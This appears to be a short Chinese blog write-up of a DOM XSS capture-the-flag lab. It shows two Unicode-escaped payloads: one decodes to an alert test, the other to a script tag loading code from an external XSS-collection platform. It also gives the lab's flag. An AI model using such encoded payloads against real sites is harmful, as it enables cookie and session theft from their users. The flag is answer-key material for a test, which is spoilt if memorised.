封神台DOM XSS靶场

本文介绍了DOM型跨站脚本(DOM XSS)的攻击实例,通过在页面输入框中使用Native编码触发JavaScript执行,展示了payload如何在URL中成功执行并弹窗。进一步,利用编码后的payload从xss平台构造攻击,最终根据靶场提示获取flag。文章揭示了DOM XSS的安全风险及防范措施。
摘要由CSDN通过智能技术生成

作业

DOM XSS靶场 (Rank: 10)

  1. 在页面上可填写的地方都输入 Native编码:
    \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
    插入到url中,发现弹窗了:

    此处的payload被当作代码执行了

  2. 把xss平台构造好的payload编码后插入进去:
    \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0078\u0073\u0073\u0070\u0074\u002e\u0063\u006f\u006d\u002f\u0074\u0053\u0077\u0074\u0066\u006d\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e

  3. 按照靶场提示的步骤拿到flag{zkz{x3ser-D0m}},提交正确

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值